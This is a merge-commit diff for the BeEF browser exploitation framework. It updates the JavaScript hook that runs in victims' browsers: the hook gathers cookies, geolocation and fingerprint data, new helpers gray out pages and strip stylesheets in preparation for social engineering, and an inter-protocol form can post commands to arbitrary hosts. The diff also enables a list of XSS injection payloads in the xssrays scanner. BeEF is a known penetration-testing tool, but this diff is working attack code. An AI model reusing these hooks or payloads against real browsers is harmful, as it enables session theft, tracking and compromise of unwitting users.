Merge pull request #849 from geefunkmasterpro/master

Enhancements to Mass Mailer

Gemfile

@@ -9,13 +9,12 @@
 # Gems only required on Windows, or with specific Windows issues
 if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
   gem "win32console"
-  gem "eventmachine", "1.0.0.beta.4.1"
-else
-  gem "eventmachine", "0.12.10"
 end
 
+gem "eventmachine", "1.0.3"
 gem "thin"
-gem "sinatra", "1.3.2"
+gem "sinatra", "1.4.2"
+gem "rack", "1.5.2"
 gem "em-websocket", "~> 0.3.6"
 gem "jsmin", "~> 1.0.1"
 gem "ansi"

Rakefile

@@ -76,10 +76,10 @@ end
 @beef_process_id = nil;
 
 task :beef_start => 'beef' do
-  printf "Starting BeEF (wait 10 seconds)..."
+  printf "Starting BeEF (wait a few seconds)..."
   @beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
-  delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
-  delays.each do |i| # delay for 10 seconds
+  delays = [3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
+  delays.each do |i| # delay for a few seconds
     printf '.'
     sleep (i)
   end

VERSION

@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.3-alpha
+0.4.4.5-alpha

beef

@@ -75,6 +75,7 @@ case config.get("beef.database.driver")
     DataMapper.setup(:default,
                      :adapter => config.get("beef.database.driver"),
                      :host => config.get("beef.database.db_host"),
+                     :port => config.get("beef.database.db_port"),
                      :username => config.get("beef.database.db_user"),
                      :password => config.get("beef.database.db_passwd"),
                      :database => config.get("beef.database.db_name"),

config.yaml

@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.3-alpha'
+    version: '0.4.4.5-alpha'
     debug: false
 
     restrictions:
@@ -27,12 +27,20 @@ beef:
         # if running behind a nat set the public ip address here
         #public: ""
         #public_port: "" # port setting is experimental
-        dns: "localhost"
+        # DNS
+        dns_host: "localhost"
+        dns_port: 53
         panel_path: "/ui/panel"
         hook_file: "/hook.js"
         hook_session_name: "BEEFHOOK"
         session_cookie_name: "BEEFSESSION"
 
+        # Allow one or multiple domains to access the RESTful API using CORS
+        # For multiple domains use: "http://browserhacker.com, http://domain2.com"
+        restful_api:
+            allow_cors: false
+            cors_allowed_domains: "http://browserhacker.com"
+
         # Prefer WebSockets over XHR-polling when possible.
         websocket:
           enable: false
@@ -43,14 +51,14 @@ beef:
 
         # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
         web_server_imitation:
-            enable: false
+            enable: true
             type: "apache" #supported: apache, iis
 
         # Experimental HTTPS support for the hook / admin / all other Thin managed web services
         https:
             enable: false
             # In production environments, be sure to use a valid certificate signed for the value
-            # used in beef.http.dns (the domain name of the server where you run BeEF)
+            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
             key: "beef_key.pem"
             cert: "beef_cert.pem"
 
@@ -72,6 +80,7 @@ beef:
 
         # db connection information is only used for mysql/postgres
         db_host: "localhost"
+        db_port: 5432
         db_name: "beef"
         db_user: "beef"
         db_passwd: "beef123"
@@ -91,6 +100,10 @@ beef:
 
     crypto_default_value_length: 80
 
+    # Enable client-side debugging
+    client:
+        debug: false
+
     # You may override default extension configuration parameters here
     extension:
         requester:

core/main/client/beef.js

@@ -31,7 +31,21 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
 		
 		// An array containing all the BeEF JS components.
 		components: new Array(),
-		
+
+                /**
+                 * Adds a function to display debug messages (wraps console.log())
+                 * @param: {string} the debug string to return
+                 */
+                debug: function(msg) {
+                    if (!<%= @client_debug %>) return;
+                    if (typeof console == "object" && typeof console.log == "function") {
+                        console.log(msg);
+                    } else {
+                        // TODO: maybe add a callback to BeEF server for debugging purposes
+                        //window.alert(msg);
+                    }
+                },
+
 		/**
 		 * Adds a function to execute.
 		 * @param: {Function} the function to execute.

core/main/client/browser.js

@@ -236,12 +236,20 @@ beef.browser = {
 		return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/20\./) != null;
 	},
 
+    /**
+     * Returns true if FF21
+     * @example: beef.browser.isFF21()
+     */
+    isFF21:function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/21\./) != null;
+    },
+
     /**
      * Returns true if FF.
      * @example: beef.browser.isFF()
      */
     isFF:function () {
-        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20();
+        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21();
     },
 
     /**
@@ -444,12 +452,20 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 25) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome 26.
+     * @example: beef.browser.isC26()
+     */
+    isC26:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 26) ? true : false);
+    },
+
     /**
      * Returns true if Chrome.
      * @example: beef.browser.isC()
      */
     isC:function () {
-        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24() || this.isC25();
+        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24() || this.isC25() || this.isC26();
     },
 
     /**
@@ -530,6 +546,7 @@ beef.browser = {
             C23:this.isC23(), // Chrome 23
             C24:this.isC24(), // Chrome 24
             C25:this.isC25(), // Chrome 25
+            C26:this.isC26(), // Chrome 26
             C:this.isC(), // Chrome any version
 
             FF2:this.isFF2(), // Firefox 2
@@ -552,7 +569,8 @@ beef.browser = {
             FF17:this.isFF17(), // Firefox 17
             FF18:this.isFF18(), // Firefox 18
             FF19:this.isFF19(), // Firefox 19
-			FF20:this.isFF20(), // Firefox 20
+            FF20:this.isFF20(), // Firefox 20
+            FF21:this.isFF21(), // Firefox 21
             FF:this.isFF(), // Firefox any version
 
             IE6:this.isIE6(), // Internet Explorer 6
@@ -667,7 +685,11 @@ beef.browser = {
         if (this.isC25()) {
             return '25'
         }
-        ;
+        ;    // Chrome 25
+        if (this.isC26()) {
+            return '26'
+        }
+        ;    // Chrome 26
         if (this.isFF2()) {
             return '2'
         }
@@ -748,10 +770,14 @@ beef.browser = {
             return '19'
         }
         ;    // Firefox 19
-		if (this.isFF20()) {
-			return '20'
-		}
-		;	// Firefox 20
+        if (this.isFF20()) {
+            return '20'
+        }
+        ;    // Firefox 20
+        if (this.isFF21()) {
+            return '21'
+        }
+        ;    // Firefox 21
 
         if (this.isIE6()) {
             return '6'
@@ -858,10 +884,10 @@ beef.browser = {
             try {
                 // append hook script
                 self.frames[i].document.body.appendChild(script);
-                //console.log("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
+                beef.debug("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
             } catch (e) {
                 // warn on cross-domain
-                //console.log("Hooking frame failed");
+                beef.debug("Hooking frame failed");
             }
         }
     },
@@ -1069,8 +1095,9 @@ beef.browser = {
      */
     hasPhonegap:function () {
         var result = false;
+        
         try {
-            if (!!device.phonegap) result = true; else result = false;
+            if (!!device.phonegap || !!device.cordova) result = true; else result = false;
         }
         catch (e) {
             result = false;
@@ -1436,63 +1463,64 @@ beef.browser = {
     getDetails:function () {
         var details = new Array();
 
-        var browser_name = beef.browser.getBrowserName();
-        var browser_version = beef.browser.getBrowserVersion();
+        var browser_name     = beef.browser.getBrowserName();
+        var browser_version  = beef.browser.getBrowserVersion();
         var browser_reported_name = beef.browser.getBrowserReportedName();
-        var page_title = (document.title) ? document.title : "Unknown";
-        var page_uri = document.location.href;
-        var page_referrer = (document.referrer) ? document.referrer : "Unknown";
-        var hostname = document.location.hostname;
-        var hostport = (document.location.port) ? document.location.port : "80";
-        var browser_plugins = beef.browser.getPlugins();
-        var date_stamp = new Date().toString();
-        var os_name = beef.os.getName();
-        var hw_name = beef.hardware.getName();
-        var cpu_type = beef.hardware.cpuType();
-        var touch_enabled = (beef.hardware.isTouchEnabled()) ? "Yes" : "No";
+        var page_title       = (document.title) ? document.title : "Unknown";
+        var page_uri         = (document.location.href) ? document.location.href : "Unknown";
+        var page_referrer    = (document.referrer) ? document.referrer : "Unknown";
+        var hostname         = (document.location.hostname) ? document.location.hostname : "Unknown";
+        var hostport         = (document.location.port) ? document.location.port : "80";
+        var browser_plugins  = beef.browser.getPlugins();
+        var date_stamp       = new Date().toString();
+        var os_name          = beef.os.getName();
+        var hw_name          = beef.hardware.getName();
+        var cpu_type         = beef.hardware.cpuType();
+        var touch_enabled    = (beef.hardware.isTouchEnabled()) ? "Yes" : "No";
         var browser_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
         var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {
             if (value == true) return value; else if (typeof value == 'object') return value; else return;
         });
-        var screen_size = beef.browser.getScreenSize();
-        var window_size = beef.browser.getWindowSize();
-        var java_enabled = (beef.browser.javaEnabled()) ? "Yes" : "No";
-        var vbscript_enabled = (beef.browser.hasVBScript()) ? "Yes" : "No";
-        var has_flash = (beef.browser.hasFlash()) ? "Yes" : "No";
-        var has_phonegap = (beef.browser.hasPhonegap()) ? "Yes" : "No";
-        var has_googlegears = (beef.browser.hasGoogleGears()) ? "Yes" : "No";
-        var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No";
-        var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No";
-        var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
-        var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
-        var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
-        var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No"; 
-        var has_vlc = (beef.browser.hasVLC()) ? "Yes" : "No";
-        var has_foxit = (beef.browser.hasFoxit()) ? "Yes" : "No";
+        var screen_size      = beef.browser.getScreenSize();
+        var window_size      = beef.browser.getWindowSize();
+        var java_enabled     = (beef.browser.javaEnabled()) ?     "Yes" : "No";
+        var vbscript_enabled = (beef.browser.hasVBScript()) ?     "Yes" : "No";
+        var has_flash        = (beef.browser.hasFlash()) ?        "Yes" : "No";
+        var has_phonegap     = (beef.browser.hasPhonegap()) ?     "Yes" : "No";
+        var has_googlegears  = (beef.browser.hasGoogleGears()) ?  "Yes" : "No";
+        var has_web_socket   = (beef.browser.hasWebSocket()) ?    "Yes" : "No";
+        var has_webrtc       = (beef.browser.hasWebRTC()) ?       "Yes" : "No";
+        var has_activex      = (beef.browser.hasActiveX()) ?      "Yes" : "No";
+        var has_silverlight  = (beef.browser.hasSilverlight()) ?  "Yes" : "No";
+        var has_quicktime    = (beef.browser.hasQuickTime()) ?    "Yes" : "No";
+        var has_realplayer   = (beef.browser.hasRealPlayer()) ?   "Yes" : "No";
+        var has_wmp          = (beef.browser.hasWMP()) ?          "Yes" : "No"; 
+        var has_vlc          = (beef.browser.hasVLC()) ?          "Yes" : "No";
+        var has_foxit        = (beef.browser.hasFoxit()) ?        "Yes" : "No";
         try{
             var cookies = document.cookie;
             var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No";
             var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie")) ? "Yes" : "No";
-            if (cookies) details["Cookies"] = cookies;
-            if (has_session_cookies) details["hasSessionCookies"] = has_session_cookies;
-            if (has_persistent_cookies) details["hasPersistentCookies"] = has_persistent_cookies;
+            if (cookies) details['Cookies'] = cookies;
+            if (has_session_cookies) details['hasSessionCookies'] = has_session_cookies;
+            if (has_persistent_cookies) details['hasPersistentCookies'] = has_persistent_cookies;
         }catch(e){
             // the hooked domain is using HttpOnly. EverCookie is persisting the BeEF hook in a different way,
             // and there is no reason to read cookies at this point
-            details["Cookies"] = "Cookies can't be read. The hooked domain is most probably using HttpOnly.";
-            details["hasSessionCookies"] = "No";
-            details["hasPersistentCookies"] = "No";
+            details['Cookies'] = "Cookies can't be read. The hooked domain is most probably using HttpOnly.";
+            details['hasSessionCookies'] = "No";
+            details['hasPersistentCookies'] = "No";
         }
 
-        if (browser_name) details["BrowserName"] = browser_name;
-        if (browser_version) details["BrowserVersion"] = browser_version;
-        if (browser_reported_name) details["BrowserReportedName"] = browser_reported_name;
-        if (page_title) details["PageTitle"] = page_title;
-        if (page_uri) details["PageURI"] = page_uri;
-        if (page_referrer) details["PageReferrer"] = page_referrer;
-        if (hostname) details["HostName"] = hostname;
-        if (hostport) details["HostPort"] = hostport;
-        if (browser_plugins) details["BrowserPlugins"] = browser_plugins;
+        if (browser_name) details['BrowserName'] = browser_name;
+        if (browser_version) details['BrowserVersion'] = browser_version;
+        if (browser_reported_name) details['BrowserReportedName'] = browser_reported_name;
+        if (page_title) details['PageTitle'] = page_title;
+        if (page_uri) details['PageURI'] = page_uri;
+        if (page_referrer) details['PageReferrer'] = page_referrer;
+        if (hostname) details['HostName'] = hostname;
+        if (hostport) details['HostPort'] = hostport;
+        if (browser_plugins) details['BrowserPlugins'] = browser_plugins;
         if (os_name) details['OsName'] = os_name;
         if (hw_name) details['Hardware'] = hw_name;
         if (cpu_type) details['CPU'] = cpu_type;
@@ -1503,11 +1531,12 @@ beef.browser = {
         if (screen_size) details['ScreenSize'] = screen_size;
         if (window_size) details['WindowSize'] = window_size;
         if (java_enabled) details['JavaEnabled'] = java_enabled;
-        if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled
-        if (has_flash) details['HasFlash'] = has_flash
-        if (has_phonegap) details['HasPhonegap'] = has_phonegap
-        if (has_web_socket) details['HasWebSocket'] = has_web_socket
-        if (has_googlegears) details['HasGoogleGears'] = has_googlegears
+        if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled;
+        if (has_flash) details['HasFlash'] = has_flash;
+        if (has_phonegap) details['HasPhonegap'] = has_phonegap;
+        if (has_web_socket) details['HasWebSocket'] = has_web_socket;
+        if (has_googlegears) details['HasGoogleGears'] = has_googlegears;
+        if (has_webrtc) details['HasWebRTC'] = has_webrtc;
         if (has_activex) details['HasActiveX'] = has_activex;
         if (has_silverlight) details['HasSilverlight'] = has_silverlight;
         if (has_quicktime) details['HasQuickTime'] = has_quicktime;
@@ -1526,6 +1555,13 @@ beef.browser = {
         return !!window.ActiveXObject;
     },
 
+    /**
+     * Returns boolean value depending on whether the browser supports WebRTC
+     */
+    hasWebRTC:function () {
+        return (!!window.mozRTCPeerConnection || !!window.webkitRTCPeerConnection);
+    },
+
     /**
      * Returns boolean value depending on whether the browser supports Silverlight
      */

core/main/client/dom.js

@@ -76,6 +76,30 @@ beef.dom = {
 		
 		return iframe;
 	},
+
+	/**
+	 * Returns the highest current z-index
+	 * @param: {Boolean} whether to return an associative array with the height AND the ID of the element
+	 * @return: {Integer} Highest z-index in the DOM
+	 * OR
+	 * @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
+	 */
+	getHighestZindex: function(include_id) {
+		var highest = {'height':0, 'elem':''};
+		$j('*').each(function() {
+			var current_high = parseInt($j(this).css("zIndex"),10);
+			if (current_high > highest.height) {
+				highest.height = current_high;
+				highest.elem = $j(this).attr('id');
+			}
+		});
+
+		if (include_id) {
+			return highest;
+		} else {
+			return highest.height;
+		}
+	},
 	
 	/**
      * Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
@@ -95,8 +119,15 @@ beef.dom = {
 			var form_action = params['src'];
 			params['src'] = '';
 		}
-		if (type == 'hidden') { css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); }
-		if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px'}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); }
+		if (type == 'hidden') {
+			css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
+		} else if (type == 'fullscreen') {
+			css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
+			$j('body').css({'padding':'0px', 'margin':'0px'});
+		} else {
+			css = styles;
+			$j('body').css({'padding':'0px', 'margin':'0px'});
+		}
 		var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
 		
 		if (form_submit && form_action)
@@ -127,6 +158,75 @@ beef.dom = {
             }
         });
     },
+
+    /**
+     * Load a full screen div that is black, or, transparent
+     * @param: {Boolean} vis: whether or not you want the screen dimmer enabled or not
+     * @param: {Hash} options: a collection of options to customise how the div is configured, as follows:
+     *         opacity:0-100         // Lower number = less grayout higher = more of a blackout
+     *           // By default this is 70 
+     *         zindex: #             // HTML elements with a higher zindex appear on top of the gray out
+     *           // By default this will use beef.dom.getHighestZindex to always go to the top
+     *         bgcolor: (#xxxxxx)    // Standard RGB Hex color code
+     *           // By default this is #000000
+     */
+	grayOut: function(vis, options) {
+	  // in any order.  Pass only the properties you need to set.
+	  var options = options || {};
+	  var zindex = options.zindex || beef.dom.getHighestZindex()+1;
+	  var opacity = options.opacity || 70;
+	  var opaque = (opacity / 100);
+	  var bgcolor = options.bgcolor || '#000000';
+	  var dark=document.getElementById('darkenScreenObject');
+	  if (!dark) {
+	    // The dark layer doesn't exist, it's never been created.  So we'll
+	    // create it here and apply some basic styles.
+	    // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
+	    var tbody = document.getElementsByTagName("body")[0];
+	    var tnode = document.createElement('div');           // Create the layer.
+	        tnode.style.position='absolute';                 // Position absolutely
+	        tnode.style.top='0px';                           // In the top
+	        tnode.style.left='0px';                          // Left corner of the page
+	        tnode.style.overflow='hidden';                   // Try to avoid making scroll bars            
+	        tnode.style.display='none';                      // Start out Hidden
+	        tnode.id='darkenScreenObject';                   // Name it so we can find it later
+	    tbody.appendChild(tnode);                            // Add it to the web page
+	    dark=document.getElementById('darkenScreenObject');  // Get the object.
+	  }
+	  if (vis) {
+	    // Calculate the page width and height 
+	    if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
+	        var pageWidth = document.body.scrollWidth+'px';
+	        var pageHeight = document.body.scrollHeight+'px';
+	    } else if( document.body.offsetWidth ) {
+	      var pageWidth = document.body.offsetWidth+'px';
+	      var pageHeight = document.body.offsetHeight+'px';
+	    } else {
+	       var pageWidth='100%';
+	       var pageHeight='100%';
+	    }
+	    //set the shader to cover the entire page and make it visible.
+	    dark.style.opacity=opaque;
+	    dark.style.MozOpacity=opaque;
+	    dark.style.filter='alpha(opacity='+opacity+')';
+	    dark.style.zIndex=zindex;
+	    dark.style.backgroundColor=bgcolor;
+	    dark.style.width= pageWidth;
+	    dark.style.height= pageHeight;
+	    dark.style.display='block';
+	  } else {
+	     dark.style.display='none';
+	  }
+	},
+
+	/**
+	 * Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
+	 *  or, re-writing a document this is useful.
+	 */
+	removeStylesheets: function() {
+		$j('link[rel=stylesheet]').remove();
+		$j('style').remove();
+	},
 	
 	/**
      * Create a form element with the specified parameters, appending it to the DOM if append == true
@@ -292,7 +392,7 @@ beef.dom = {
             }
             content += "</object>";
         }
-        if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO()) {
+        if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
 
             if (codebase != null) {
                 content = "" +
@@ -311,24 +411,25 @@ beef.dom = {
             }
             content += "</applet>";
         }
-        if (beef.browser.isFF()) {
-            if (codebase != null) {
-                content = "" +
-                    "<embed id='" + id + "' code='" + code + "' " +
-                    "type='application/x-java-applet' codebase='" + codebase + "' " +
-                    "height='0' width='0' name='" + name + "'>";
-            } else {
-                content = "" +
-                    "<embed id='" + id + "' code='" + code + "' " +
-                    "type='application/x-java-applet' archive='" + archive + "' " +
-                    "height='0' width='0' name='" + name + "'>";
-            }
-
-            if (params != null) {
-                content += beef.dom.parseAppletParams(params);
-            }
-            content += "</embed>";
-        }
+        // For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
+//        if (beef.browser.isFF()) {
+//            if (codebase != null) {
+//                content = "" +
+//                    "<embed id='" + id + "' code='" + code + "' " +
+//                    "type='application/x-java-applet' codebase='" + codebase + "' " +
+//                    "height='0' width='0' name='" + name + "'>";
+//            } else {
+//                content = "" +
+//                    "<embed id='" + id + "' code='" + code + "' " +
+//                    "type='application/x-java-applet' archive='" + archive + "' " +
+//                    "height='0' width='0' name='" + name + "'>";
+//            }
+//
+//            if (params != null) {
+//                content += beef.dom.parseAppletParams(params);
+//            }
+//            content += "</embed>";
+//        }
         $j('body').append(content);
     },
 
@@ -375,11 +476,11 @@ beef.dom = {
      * @params: {String} rport: remote port
      * @params: {String} commands: protocol commands to be executed by the remote host:port service
      */
-    createIframeIpecForm: function(rhost, rport, commands){
+    createIframeIpecForm: function(rhost, rport, path, commands){
         var iframeIpec = beef.dom.createInvisibleIframe();
 
         var formIpec = document.createElement('form');
-        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+'/index.html');
+        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+path);
         formIpec.setAttribute('method',  'POST');
         formIpec.setAttribute('enctype', 'multipart/form-data');
 

core/main/client/geolocation.js

@@ -32,14 +32,14 @@ beef.geolocation = {
 
         $j.ajax({
             error: function(xhr, status, error){
-                //console.log("[geolocation.js] openstreetmap error");
+                beef.debug("[geolocation.js] openstreetmap error");
                 beef.net.send(command_url, command_id, "latitude=" + latitude
                              + "&longitude=" + longitude
                              + "&osm=UNAVAILABLE"
                              + "&geoLocEnabled=True");
                 },
             success: function(data, status, xhr){
-                //console.log("[geolocation.js] openstreetmap success");
+                beef.debug("[geolocation.js] openstreetmap success");
                 var jsonResp = $j.parseJSON(data);
 
                 beef.net.send(command_url, command_id, "latitude=" + latitude
@@ -64,16 +64,16 @@ beef.geolocation = {
 	        beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");	
 			return;
 		}
-        //console.log("[geolocation.js] navigator.geolocation.getCurrentPosition");
+        beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
         navigator.geolocation.getCurrentPosition( //note: this is an async call
 			function(position){ // success
 				var latitude = position.coords.latitude;
         		var longitude = position.coords.longitude;
-                //console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
+                beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
                 beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
 
 			}, function(error){ // failure
-                    //console.log("[geolocation.js] error [%d] getting position", error.code);
+                    beef.debug("[geolocation.js] error [%d] getting position", error.code);
 					switch(error.code) // Returns 0-3
 					{
 						case 0:

core/main/client/hardware.js

@@ -126,4 +126,4 @@ beef.hardware = {
 	}
 };
 
-beef.regCmp('beef.net.hardware');
+beef.regCmp('beef.hardware');

core/main/client/init.js

@@ -13,7 +13,8 @@
  * and will have a new session id. The new session id will need to know
  * the brwoser details. So sendback the browser details again.
  */
-BEEFHOOK = beef.session.get_hook_session_id();
+
+beef.session.get_hook_session_id();
 
 if (beef.pageIsLoaded) {
     beef.net.browser_details();
@@ -31,7 +32,7 @@ window.onpopstate = function (event) {
             try {
                 callback(event);
             } catch (e) {
-                console.log("window.onpopstate - couldn't execute callback: " + e.message);
+                beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
             }
             return false;
         }
@@ -46,7 +47,7 @@ window.onclose = function (event) {
             try {
                 callback(event);
             } catch (e) {
-                console.log("window.onclose - couldn't execute callback: " + e.message);
+                beef.debug("window.onclose - couldn't execute callback: " + e.message);
             }
             return false;
         }

core/main/client/net/dns.js

@@ -43,7 +43,7 @@ beef.net.dns = {
 
 		// sends a DNS request
 		sendQuery = function(query) {
-			//console.log("Requesting: "+query);
+			beef.debug("Requesting: "+query);
 			var img = new Image;
 			img.src = "http://"+query;
 			img.onload = function() { dom.removeChild(this); }

core/main/client/net/xssrays.js

@@ -49,22 +49,20 @@ beef.net.xssrays = {
     //browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
     vectors: [
 
-//				  {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true},
-				  {input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //,
-//				  {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
-				  {input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'"><script>XSS<\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'"><body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
-//				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
+				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
